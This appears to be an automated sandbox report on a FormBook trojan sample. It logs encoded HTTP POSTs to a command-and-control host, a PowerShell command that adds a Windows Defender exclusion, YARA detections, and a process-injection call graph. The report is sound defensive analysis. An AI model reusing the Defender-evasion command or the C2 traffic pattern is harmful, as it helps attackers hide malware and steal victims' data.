                          May 23, 2024 15:19:35.869069099 CEST779OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.ratulunabet78.xyz
                          Origin: http://www.ratulunabet78.xyz
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 224
                          Connection: close
                          Referer: http://www.ratulunabet78.xyz/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 77 2b 31 77 6a 71 6b 7a 36 76 42 44 41 6a 45 44 54 52 75 72 6a 57 37 4e 47 66 45 62 77 65 64 39 7a 31 36 67 48 6f 63 57 57 72 52 59 7a 42 61 65 69 67 53 42 6c 62 35 35 7a 71 51 34 74 4d 78 5a 74 48 37 4d 77 4c 43 47 46 67 32 55 4b 55 56 4b 62 77 39 44 59 67 4b 79 41 43 51 58 50 6d 75 55 4c 32 57 32 75 38 79 68 41 36 4c 4f 45 51 2f 77 37 7a 50 76 77 41 68 53 5a 6b 52 4d 33 35 79 71 6c 33 33 34 6f 5a 6c 64 72 47 68 33 53 48 6b 7a 53 6c 66 4d 34 48 77 53 33 6f 73 74 65 74 55 52 67 49 30 5a 6f 71 77 31 34 38 66 65 38 7a 79 77 6d 47 77 75 74 73 71 43 49 52 39 71 71 6c 35 79 6c 39 52 48 63 64 6a 4c 49 58 4d 55 77 42 41 38 31 78 45 56 79 77 59 43 4c 74 30 51
                          Data Ascii: vH5=w+1wjqkz6vBDAjEDTRurjW7NGfEbwed9z16gHocWWrRYzBaeigSBlb55zqQ4tMxZtH7MwLCGFg2UKUVKbw9DYgKyACQXPmuUL2W2u8yhA6LOEQ/w7zPvwAhSZkRM35yql334oZldrGh3SHkzSlfM4HwS3ostetURgI0Zoqw148fe8zywmGwutsqCIR9qql5yl9RHcdjLIXMUwBA81xEVywYCLt0Q
                          May 23, 2024 15:19:36.461682081 CEST1236INHTTP/1.1 404 Not Found
                          keep-alive: timeout=5, max=100
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 1251
                          date: Thu, 23 May 2024 13:19:36 GMT
                          server: LiteSpeed
                          x-turbo-charged-by: LiteSpeed
                          connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                          May 23, 2024 15:19:36.466526985 CEST316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                          Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          35192.168.2.55368866.29.137.43807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:19:38.400913954 CEST1796OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.ratulunabet78.xyz
                          Origin: http://www.ratulunabet78.xyz
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 1240
                          Connection: close
                          Referer: http://www.ratulunabet78.xyz/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 77 2b 31 77 6a 71 6b 7a 36 76 42 44 41 6a 45 44 54 52 75 72 6a 57 37 4e 47 66 45 62 77 65 64 39 7a 31 36 67 48 6f 63 57 57 72 5a 59 7a 7a 69 65 69 44 36 42 6b 62 35 35 36 4b 51 44 74 4d 78 49 74 48 53 46 77 4c 47 38 46 69 4f 55 4b 32 64 4b 50 56 64 44 42 51 4b 79 66 53 51 4b 42 47 75 37 4c 33 36 79 75 38 43 68 41 36 4c 4f 45 53 33 77 79 43 50 76 79 41 68 52 52 45 52 32 7a 35 7a 31 6c 33 65 41 6f 5a 67 6f 72 31 70 33 53 6e 30 7a 51 52 2f 4d 6c 58 77 63 30 6f 74 77 65 74 59 65 67 49 59 6a 6f 71 56 65 34 38 58 65 34 6d 66 54 68 30 73 44 32 65 79 59 44 79 77 47 79 78 78 35 6c 2b 56 78 57 39 72 55 46 6c 56 2f 32 6e 39 34 32 31 46 44 67 32 6b 51 48 70 4a 61 38 70 41 66 37 6b 47 35 4a 5a 6f 2f 67 4d 59 73 48 66 44 54 77 30 34 74 46 4c 65 71 59 48 36 44 4a 34 43 57 47 38 31 4d 6f 5a 57 72 63 71 45 43 54 4f 2f 56 4a 35 4d 31 61 59 78 4b 37 58 67 43 53 31 30 63 72 79 34 56 39 73 69 32 70 52 77 57 6b 65 6d 6e 70 76 68 36 4c 6e 63 4c 75 67 72 54 74 77 34 56 63 6a 6e 59 66 50 41 76 46 33 4c 4e 32 47 [TRUNCATED]
                          Data Ascii: vH5=w+1wjqkz6vBDAjEDTRurjW7NGfEbwed9z16gHocWWrZYzzieiD6Bkb556KQDtMxItHSFwLG8FiOUK2dKPVdDBQKyfSQKBGu7L36yu8ChA6LOES3wyCPvyAhRRER2z5z1l3eAoZgor1p3Sn0zQR/MlXwc0otwetYegIYjoqVe48Xe4mfTh0sD2eyYDywGyxx5l+VxW9rUFlV/2n9421FDg2kQHpJa8pAf7kG5JZo/gMYsHfDTw04tFLeqYH6DJ4CWG81MoZWrcqECTO/VJ5M1aYxK7XgCS10cry4V9si2pRwWkemnpvh6LncLugrTtw4VcjnYfPAvF3LN2GCx4r6EwGO7r1A7IntdpDhFx2pIPLl0X03GlZmWqazEzxGzYayDoZJxUD3xMGQraPTV5b8JJsf80rpbgwEEIXb2RvD4VlCUheXHGZAKmlfUo1mEmqUf5/1yA0aiZB91EwnL7m9Tk2AcLGWQ7hJ9jBG8hv0dSKu5S6MI3NvM1/cCTCiHKtj83SENlKYlWsVW+DuI0ltmYTiEdDkZ/t6ryK+wxh5Al1L4yVsY7tfq8rBKPLFB1Hta3ERnpFK8uex1zNqPUF9GQ2u2aulhgoKjHtMpdmxnqGDYkAHdtzn63/TGtCZTw6erYFJ1eqtkLfk2VVZ7ECeYm62AfhcXMT3pdeBrpIaq/KxONBQjEP8unReAA2wEr4owksmrBx4+JxwJ6gCF/8v3FumBI2KQyAQB6tXUnZPc1M9ES9PW/lseJbGjmE3ubtZhv93/bZl96lQqElm0S+5HLwe2Ry4oEya0Un8YpAP/KZjqEwkBAPLEe7JdN//E04AxqsAa7y1WoYUUqZ2VnTnIeHirVyikjNDIQZbkw9pssYHhJBWr0cIboWHzTGlh1YZshARDh5E76PEIVe/jKtOSoe+mB84GJMOhrQVxkj1axpKbHi82ZY8vjiv/9PQIBgf6HmCnTPGaLivPyx66mdxVZ4mYHww9usA/0v9nKmgd0IExC0hw [TRUNCATED]
                          May 23, 2024 15:19:39.005091906 CEST1236INHTTP/1.1 404 Not Found
                          keep-alive: timeout=5, max=100
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 1251
                          date: Thu, 23 May 2024 13:19:38 GMT
                          server: LiteSpeed
                          x-turbo-charged-by: LiteSpeed
                          connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                          May 23, 2024 15:19:39.009840012 CEST316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                          Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          36192.168.2.55368966.29.137.43807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:19:41.197451115 CEST487OUTGET /a42m/?vH5=98dQgeI97PpkPBwDNVDdt2fIP/8t+dN1kUHbH7cCS7ph4DK0k1WK4KE3/58PmNJa+S2FnMy9XFHjKVdPS0wRAwevARZLL3+cVCGRrbGhBpDtYSzj3TCwpxccczld+77x/A==&R0nl4=f64p HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.ratulunabet78.xyz
                          Connection: close
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          May 23, 2024 15:19:41.800538063 CEST1236INHTTP/1.1 404 Not Found
                          keep-alive: timeout=5, max=100
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 1251
                          date: Thu, 23 May 2024 13:19:41 GMT
                          server: LiteSpeed
                          x-turbo-charged-by: LiteSpeed
                          connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                          May 23, 2024 15:19:41.805368900 CEST316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                          Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:09:15:50
                          Start date:23/05/2024
                          Path:C:\Users\user\Desktop\PO Copy_7854569.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\PO Copy_7854569.exe"
                          Imagebase:0xdc0000
                          File size:715'264 bytes
                          MD5 hash:1A446464CE98784973A5E7BD13190A5B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:3
                          Start time:09:15:51
                          Start date:23/05/2024
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe"
                          Imagebase:0x7c0000
                          File size:433'152 bytes
                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:4
                          Start time:09:15:51
                          Start date:23/05/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:5
                          Start time:09:15:51
                          Start date:23/05/2024
                          Path:C:\Users\user\Desktop\PO Copy_7854569.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\PO Copy_7854569.exe"
                          Imagebase:0x120000
                          File size:715'264 bytes
                          MD5 hash:1A446464CE98784973A5E7BD13190A5B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:6
                          Start time:09:15:52
                          Start date:23/05/2024
                          Path:C:\Users\user\Desktop\PO Copy_7854569.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\PO Copy_7854569.exe"
                          Imagebase:0xb40000
                          File size:715'264 bytes
                          MD5 hash:1A446464CE98784973A5E7BD13190A5B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2120310446.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2120310446.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2122191823.0000000002E50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2122191823.0000000002E50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:7
                          Start time:09:15:58
                          Start date:23/05/2024
                          Path:C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe"
                          Imagebase:0xae0000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:false

                          General

                          Target ID:8
                          Start time:09:15:59
                          Start date:23/05/2024
                          Path:C:\Windows\SysWOW64\openfiles.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\SysWOW64\openfiles.exe"
                          Imagebase:0x190000
                          File size:60'416 bytes
                          MD5 hash:50BD10A4C573E609A401114488299D3D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4439108659.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4439108659.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4440623367.00000000045A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4440623367.00000000045A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:moderate
                          Has exited:false

                          General

                          Target ID:10
                          Start time:09:16:14
                          Start date:23/05/2024
                          Path:C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe"
                          Imagebase:0xae0000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4442575534.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4442575534.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:false

                          General

                          Target ID:13
                          Start time:09:16:51
                          Start date:23/05/2024
                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                          Imagebase:0x7ff79f9e0000
                          File size:676'768 bytes
                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:9.9%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:1%
                            Total number of Nodes:206
                            Total number of Limit Nodes:14
                            execution_graph 25101 16bd688 DuplicateHandle 25102 16bd71e 25101->25102 25314 76eba18 25315 76ebba3 25314->25315 25316 76eba3e 25314->25316 25316->25315 25318 76e9e6c 25316->25318 25319 76ebc98 PostMessageW 25318->25319 25320 76ebd04 25319->25320 25320->25316 25103 76e93c9 25107 76ea698 25103->25107 25111 76ea694 25103->25111 25104 76e93e4 25108 76ea6ad 25107->25108 25115 76ea6c8 25108->25115 25109 76ea6bf 25109->25104 25112 76ea6ad 25111->25112 25114 76ea6c8 12 API calls 25112->25114 25113 76ea6bf 25113->25104 25114->25113 25116 76ea6f2 25115->25116 25117 76ea6fa 25116->25117 25136 76eab6f 25116->25136 25141 76eab4e 25116->25141 25146 76eaf6e 25116->25146 25151 76eabf4 25116->25151 25155 76eb174 25116->25155 25160 76ead77 25116->25160 25165 76eb0f6 25116->25165 25169 76eacf6 25116->25169 25174 76eac56 25116->25174 25179 76eaa76 25116->25179 25187 76eae39 25116->25187 25192 76ead1b 25116->25192 25199 76eaafb 25116->25199 25206 76eadbc 25116->25206 25211 76eaf84 25116->25211 25216 76eb226 25116->25216 25221 76eaaad 25116->25221 25230 76eaecc 25116->25230 25117->25109 25137 76eab57 25136->25137 25138 76eab69 25137->25138 25235 76e8d58 25137->25235 25239 76e8d50 25137->25239 25138->25117 25142 76eab57 25141->25142 25143 76eab69 25142->25143 25144 76e8d58 ReadProcessMemory 25142->25144 25145 76e8d50 ReadProcessMemory 25142->25145 25143->25117 25144->25142 25145->25142 25148 76eaed3 25146->25148 25147 76eb4fc 25147->25117 25243 76e8c68 25148->25243 25247 76e8c60 25148->25247 25153 76e8c68 WriteProcessMemory 25151->25153 25154 76e8c60 WriteProcessMemory 25151->25154 25152 76eac18 25153->25152 25154->25152 25156 76eb176 25155->25156 25252 76eb780 25156->25252 25257 76eb771 25156->25257 25157 76eb0e3 25161 76eab69 25160->25161 25162 76eab57 25160->25162 25161->25117 25162->25160 25162->25161 25163 76e8d58 ReadProcessMemory 25162->25163 25164 76e8d50 ReadProcessMemory 25162->25164 25163->25162 25164->25162 25270 76e8ba0 25165->25270 25274 76e8ba8 25165->25274 25166 76eb114 25170 76eac5e 25169->25170 25170->25117 25278 76e85e8 25170->25278 25282 76e85e0 25170->25282 25171 76eb4a5 25175 76eac5e 25174->25175 25177 76e85e8 ResumeThread 25175->25177 25178 76e85e0 ResumeThread 25175->25178 25176 76eb4a5 25177->25176 25178->25176 25180 76eaafc 25179->25180 25286 76e8ee5 25180->25286 25290 76e8ef0 25180->25290 25188 76eae3f 25187->25188 25190 76e85e8 ResumeThread 25188->25190 25191 76e85e0 ResumeThread 25188->25191 25189 76eb4a5 25190->25189 25191->25189 25294 76eb97f 25192->25294 25299 76eb990 25192->25299 25193 76ead33 25197 76e85e8 ResumeThread 25193->25197 25198 76e85e0 ResumeThread 25193->25198 25194 76eb4a5 25197->25194 25198->25194 25200 76eab2f 25199->25200 25202 76e8ee5 CreateProcessA 25199->25202 25203 76e8ef0 CreateProcessA 25199->25203 25201 76eab69 25200->25201 25204 76e8d58 ReadProcessMemory 25200->25204 25205 76e8d50 ReadProcessMemory 25200->25205 25201->25117 25202->25200 25203->25200 25204->25200 25205->25200 25207 76eab57 25206->25207 25208 76eab69 25207->25208 25209 76e8d58 ReadProcessMemory 25207->25209 25210 76e8d50 ReadProcessMemory 25207->25210 25208->25117 25209->25207 25210->25207 25212 76eaf91 25211->25212 25214 76e8c68 WriteProcessMemory 25212->25214 25215 76e8c60 WriteProcessMemory 25212->25215 25213 76eb321 25213->25117 25214->25213 25215->25213 25217 76eb229 